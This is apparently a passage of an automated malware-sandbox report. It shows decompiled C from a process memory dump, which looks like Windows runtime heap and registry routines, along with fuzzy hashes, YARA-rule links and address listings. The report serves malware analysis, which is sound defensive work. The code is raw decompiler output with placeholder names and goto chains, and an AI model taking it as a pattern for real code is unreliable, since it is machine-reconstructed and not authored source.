                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ea604679045a2ab9b55b47ecd54b29a1c7b40061a8a8ab45ef4f41b43bd6c21
                                                        • Instruction ID: 11387e7ab7c85bbe97148f343347cdf8ba662479af3c68caf7ccc773da975a90
                                                        • Opcode Fuzzy Hash: 9ea604679045a2ab9b55b47ecd54b29a1c7b40061a8a8ab45ef4f41b43bd6c21
                                                        • Instruction Fuzzy Hash: 68912B31E04258EFEB219BA8C844BAE7BA5EB02758F154779EA10EB2D1D774FD40C781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489C600, Relevance: .2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E0489C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x498d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E048A6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E048DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4987b9c; // 0x0
					_t74 = L048B4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E048D9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L048B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E048DF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E048D13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L048B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E048D9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                        0x0489c608
                                                        0x0489c615
                                                        0x0489c625
                                                        0x0489c62d
                                                        0x0489c635
                                                        0x0489c640
                                                        0x0489c680
                                                        0x0489c687
                                                        0x0489c688
                                                        0x0489c689
                                                        0x0489c694
                                                        0x0489c694
                                                        0x0489c642
                                                        0x0489c64a
                                                        0x0489c697
                                                        0x04907a25
                                                        0x04907a2b
                                                        0x04907a2e
                                                        0x04907a30
                                                        0x04907bea
                                                        0x04907bea
                                                        0x00000000
                                                        0x04907bea
                                                        0x04907a36
                                                        0x04907a43
                                                        0x04907a48
                                                        0x04907a4c
                                                        0x04907a4e
                                                        0x00000000
                                                        0x00000000
                                                        0x04907a58
                                                        0x04907a5a
                                                        0x04907a5b
                                                        0x04907a5c
                                                        0x04907a5d
                                                        0x04907a63
                                                        0x04907a64
                                                        0x04907a6a
                                                        0x04907a6c
                                                        0x04907a6e
                                                        0x049079cb
                                                        0x049079cb
                                                        0x049079ce
                                                        0x049079d0
                                                        0x04907a98
                                                        0x04907a9b
                                                        0x04907a9b
                                                        0x04907a9e
                                                        0x04907aa1
                                                        0x04907bbe
                                                        0x04907bbe
                                                        0x04907bc0
                                                        0x04907be0
                                                        0x04907be0
                                                        0x04907a01
                                                        0x04907a01
                                                        0x04907a05
                                                        0x04907a07
                                                        0x04907a15
                                                        0x04907a15
                                                        0x04907a1a
                                                        0x00000000
                                                        0x04907a1a
                                                        0x04907bc2
                                                        0x04907bc6
                                                        0x04907bc9
                                                        0x04907bcd
                                                        0x04907bcf
                                                        0x049079e6
                                                        0x049079e6
                                                        0x049079eb
                                                        0x049079eb
                                                        0x049079ef
                                                        0x049079f1
                                                        0x00000000
                                                        0x00000000
                                                        0x049079f3
                                                        0x049079f5
                                                        0x049079ff
                                                        0x049079ff
                                                        0x00000000
                                                        0x049079ff
                                                        0x049079f7
                                                        0x049079fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x049079fd
                                                        0x04907bd5
                                                        0x04907bd8
                                                        0x00000000
                                                        0x00000000
                                                        0x04907ba9
                                                        0x04907bac
                                                        0x04907bb0
                                                        0x04907bb1
                                                        0x04907bb1
                                                        0x04907bb6
                                                        0x00000000
                                                        0x04907bb6
                                                        0x04907aa7
                                                        0x04907aaa
                                                        0x00000000
                                                        0x00000000
                                                        0x04907ab2
                                                        0x04907ab3
                                                        0x04907ab5
                                                        0x04907aec
                                                        0x04907aef
                                                        0x04907b25
                                                        0x04907b28
                                                        0x04907b62
                                                        0x04907b64
                                                        0x04907b8f
                                                        0x04907b92
                                                        0x04907b96
                                                        0x04907b98
                                                        0x00000000
                                                        0x00000000
                                                        0x04907b9e
                                                        0x04907b9f
                                                        0x04907ba3
                                                        0x00000000
                                                        0x04907ba3
                                                        0x04907b66
                                                        0x04907b68
                                                        0x04907ae2
                                                        0x04907ae2
                                                        0x00000000
                                                        0x04907ae2
                                                        0x04907b6e
                                                        0x04907b72
                                                        0x04907b75
                                                        0x04907b81
                                                        0x04907b85
                                                        0x04907b87
                                                        0x00000000
                                                        0x00000000
                                                        0x04907b31
                                                        0x04907b34
                                                        0x04907b3c
                                                        0x04907b45
                                                        0x04907b46
                                                        0x04907b4f
                                                        0x04907b51
                                                        0x04907b57
                                                        0x04907b59
                                                        0x04907b59
                                                        0x00000000
                                                        0x04907b59
                                                        0x04907b77
                                                        0x00000000
                                                        0x04907b77
                                                        0x04907b2a
                                                        0x00000000
                                                        0x04907b2a
                                                        0x04907af1
                                                        0x04907af3
                                                        0x00000000
                                                        0x00000000
                                                        0x04907afb
                                                        0x04907afc
                                                        0x04907afe
                                                        0x00000000
                                                        0x00000000
                                                        0x04907b00
                                                        0x04907b03
                                                        0x00000000
                                                        0x00000000
                                                        0x04907b05
                                                        0x04907b09
                                                        0x04907b0d
                                                        0x04907b0f
                                                        0x00000000
                                                        0x00000000
                                                        0x04907b18
                                                        0x04907b1d
                                                        0x00000000
                                                        0x04907b1d
                                                        0x04907ab7
                                                        0x04907ab9
                                                        0x00000000
                                                        0x00000000
                                                        0x04907abf
                                                        0x04907ac1
                                                        0x00000000
                                                        0x00000000
                                                        0x04907ac3
                                                        0x04907ac6
                                                        0x00000000
                                                        0x00000000
                                                        0x04907ac8
                                                        0x04907acc
                                                        0x04907ad0
                                                        0x04907ad2
                                                        0x00000000
                                                        0x00000000
                                                        0x04907adb
                                                        0x00000000
                                                        0x04907adb
                                                        0x049079d6
                                                        0x049079d9
                                                        0x049079dc
                                                        0x04907a91
                                                        0x04907a94
                                                        0x00000000
                                                        0x04907a94
                                                        0x049079e2
                                                        0x00000000
                                                        0x049079e2
                                                        0x04907a74
                                                        0x04907a7a
                                                        0x00000000
                                                        0x00000000
                                                        0x04907a8a
                                                        0x04907a21
                                                        0x04907a21
                                                        0x00000000
                                                        0x04907a21
                                                        0x0489c650
                                                        0x0489c651
                                                        0x0489c656
                                                        0x0489c65c
                                                        0x0489c65d
                                                        0x0489c663
                                                        0x0489c664
                                                        0x0489c66a
                                                        0x0489c66e
                                                        0x049079c5
                                                        0x049079c7
                                                        0x00000000
                                                        0x049079c7
                                                        0x0489c67a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 120970b4f086650d5f3d87eb8dd60ea107e0b9cf2ed4c3adcba3c6c0ecbd1a51
                                                        • Instruction ID: 7540129457a0fa4ec96c85d0bcd22f14d776598bfac5284757e099f856bc992a
                                                        • Opcode Fuzzy Hash: 120970b4f086650d5f3d87eb8dd60ea107e0b9cf2ed4c3adcba3c6c0ecbd1a51
                                                        • Instruction Fuzzy Hash: C1816F75604605DFDB25CE98C880A7A73E9FB84364F1589BAED559B280E330FD41CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04916DC9, Relevance: .2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E04916DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04916B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E048B7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E048D9AE0();
					_t87 = L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0491795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0491795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0491795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0491795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L048B4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04916B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04916B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04916B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04916B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E048B7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E048D9AE0();
								L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L048B2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L048B2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L048B2400( &_v52);
							}
							if(_v28 >= 0) {
								return L048B2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                        0x04916dd4
                                                        0x04916dde
                                                        0x04916de1
                                                        0x04916de3
                                                        0x04916de6
                                                        0x04916de9
                                                        0x04916dec
                                                        0x04916def
                                                        0x04916df2
                                                        0x04916df5
                                                        0x04916dfe
                                                        0x04916e04
                                                        0x04916e09
                                                        0x04916e0d
                                                        0x04916e18
                                                        0x04916e1b
                                                        0x04916e22
                                                        0x04916e2d
                                                        0x04916e30
                                                        0x04916e36
                                                        0x04916e42
                                                        0x04916e4d
                                                        0x04916e50
                                                        0x04916e55
                                                        0x04916e5c
                                                        0x04916e6e
                                                        0x04916e5e
                                                        0x04916e67
                                                        0x04916e67
                                                        0x04916e73
                                                        0x04916e74
                                                        0x04916e77
                                                        0x04916e7c
                                                        0x04916e7d
                                                        0x04916e8e
                                                        0x04916e93
                                                        0x04916e9c
                                                        0x04916ea8
                                                        0x04916eab
                                                        0x04916eac
                                                        0x04916eb3
                                                        0x04916ecd
                                                        0x04916edc
                                                        0x04916ee2
                                                        0x04916ee5
                                                        0x04916ef2
                                                        0x04916efb
                                                        0x04916f01
                                                        0x04916f06
                                                        0x04916f0b
                                                        0x04916f11
                                                        0x04916f1a
                                                        0x04916f22
                                                        0x04916f26
                                                        0x04916f26
                                                        0x04916f33
                                                        0x04916f41
                                                        0x04916f44
                                                        0x04916f47
                                                        0x04916f54
                                                        0x04916f65
                                                        0x04916f77
                                                        0x04916f7c
                                                        0x04916f82
                                                        0x04916f91
                                                        0x04916f99
                                                        0x04916fa3
                                                        0x04916fae
                                                        0x04916fae
                                                        0x04916fba
                                                        0x04916fbb
                                                        0x04916fbc
                                                        0x04916fc1
                                                        0x04916fc2
                                                        0x04916fd3
                                                        0x04916fd8
                                                        0x04916fd8
                                                        0x04916fdf
                                                        0x04916fe8
                                                        0x04916fee
                                                        0x04916fee
                                                        0x04916ff5
                                                        0x04916ffb
                                                        0x04916ffb
                                                        0x04917004
                                                        0x00000000
                                                        0x0491700a
                                                        0x04917004
                                                        0x04916eb3
                                                        0x04916e9c
                                                        0x04917015

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction ID: ea1b7bb03c02d8605fecb67c132ab4cfe1f2e12a404166346c2f60996f005fb5
                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction Fuzzy Hash: B9716B71E00219AFDB11DFA8C984EEEBBB9FF88714F104569E505E7260DB30BA41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0492B8D0, Relevance: .2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 39%
                                                        			E0492B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4987b9c; // 0x0
				_t124 = L048B4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E048D9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E048D95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E048D95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L048B77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E048D9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E048D95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4987b9c; // 0x0
									_t92 = L048B4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E048D9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0489A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0492E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0492E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E048D95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                        0x0492b8d9
                                                        0x0492b8e4
                                                        0x00000000
                                                        0x0492b8e6
                                                        0x0492b8f3
                                                        0x0492b8f5
                                                        0x0492b8f5
                                                        0x0492b8f8
                                                        0x0492b920
                                                        0x0492b924
                                                        0x0492b936
                                                        0x0492b939
                                                        0x0492b93d
                                                        0x0492b948
                                                        0x0492b9a0
                                                        0x0492b9a0
                                                        0x0492b9a4
                                                        0x0492b9bf
                                                        0x0492b9c4
                                                        0x0492b9c6
                                                        0x0492b9cd
                                                        0x0492b9d1
                                                        0x0492bad4
                                                        0x0492bad8
                                                        0x0492bada
                                                        0x0492badc
                                                        0x0492badc
                                                        0x0492badf
                                                        0x0492bae0
                                                        0x0492bae2
                                                        0x0492bae4
                                                        0x0492baec
                                                        0x0492baee
                                                        0x0492baf0
                                                        0x0492baf0
                                                        0x0492baec
                                                        0x0492bafb
                                                        0x0492bafc
                                                        0x0492bafe
                                                        0x0492bb01
                                                        0x0492bb01
                                                        0x00000000
                                                        0x0492bb06
                                                        0x0492b9d7
                                                        0x0492b9db
                                                        0x0492b9db
                                                        0x0492b9de
                                                        0x0492b9de
                                                        0x0492b9e4
                                                        0x0492b9e7
                                                        0x0492b9ea
                                                        0x0492b9ec
                                                        0x0492b9ef
                                                        0x0492b9f3
                                                        0x0492ba1b
                                                        0x0492ba1b
                                                        0x0492ba23
                                                        0x0492ba24
                                                        0x0492ba27
                                                        0x0492ba2a
                                                        0x0492ba2b
                                                        0x0492ba2e
                                                        0x0492ba30
                                                        0x0492ba37
                                                        0x0492ba3f
                                                        0x0492ba9c
                                                        0x0492baa2
                                                        0x0492bb13
                                                        0x0492bb15
                                                        0x0492baae
                                                        0x0492baae
                                                        0x0492bab3
                                                        0x0492bab5
                                                        0x0492baba
                                                        0x0492bac8
                                                        0x0492bac8
                                                        0x0492baba
                                                        0x0492bacd
                                                        0x0492bacf
                                                        0x00000000
                                                        0x0492bacf
                                                        0x0492bb1a
                                                        0x00000000
                                                        0x0492bb1c
                                                        0x0492baa7
                                                        0x0492bb11
                                                        0x00000000
                                                        0x0492bb11
                                                        0x0492baa9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0492ba41
                                                        0x0492ba41
                                                        0x0492ba41
                                                        0x0492ba58
                                                        0x0492ba5d
                                                        0x0492ba62
                                                        0x00000000
                                                        0x00000000
                                                        0x0492ba64
                                                        0x0492ba67
                                                        0x0492ba68
                                                        0x0492ba69
                                                        0x0492ba6c
                                                        0x0492ba6f
                                                        0x0492ba71
                                                        0x0492ba78
                                                        0x0492ba80
                                                        0x00000000
                                                        0x00000000
                                                        0x0492ba90
                                                        0x0492ba90
                                                        0x0492ba97
                                                        0x00000000
                                                        0x0492ba97
                                                        0x0492b9f5
                                                        0x0492b9f7
                                                        0x0492b9f7
                                                        0x0492b9fa
                                                        0x0492ba03
                                                        0x0492ba07
                                                        0x0492ba0c
                                                        0x0492ba10
                                                        0x0492ba17
                                                        0x00000000
                                                        0x0492b9f7
                                                        0x0492b9a6
                                                        0x0492b9a8
                                                        0x0492b9af
                                                        0x0492b9b3
                                                        0x00000000
                                                        0x00000000
                                                        0x0492b9b9
                                                        0x00000000
                                                        0x0492b9b9
                                                        0x0492b94d
                                                        0x0492b98f
                                                        0x0492b995
                                                        0x0492b999
                                                        0x0492b960
                                                        0x0492b967
                                                        0x0492b968
                                                        0x0492b96a
                                                        0x00000000
                                                        0x0492b96a
                                                        0x0492b99b
                                                        0x0492b99e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0492b99e
                                                        0x0492b951
                                                        0x0492b954
                                                        0x0492b95a
                                                        0x0492b95e
                                                        0x0492b972
                                                        0x0492b979
                                                        0x0492b97d
                                                        0x0492b97f
                                                        0x0492b980
                                                        0x0492b982
                                                        0x0492b984
                                                        0x00000000
                                                        0x0492b984
                                                        0x00000000
                                                        0x0492b926
                                                        0x00000000
                                                        0x0492b926

                                                        Memory Dump Source
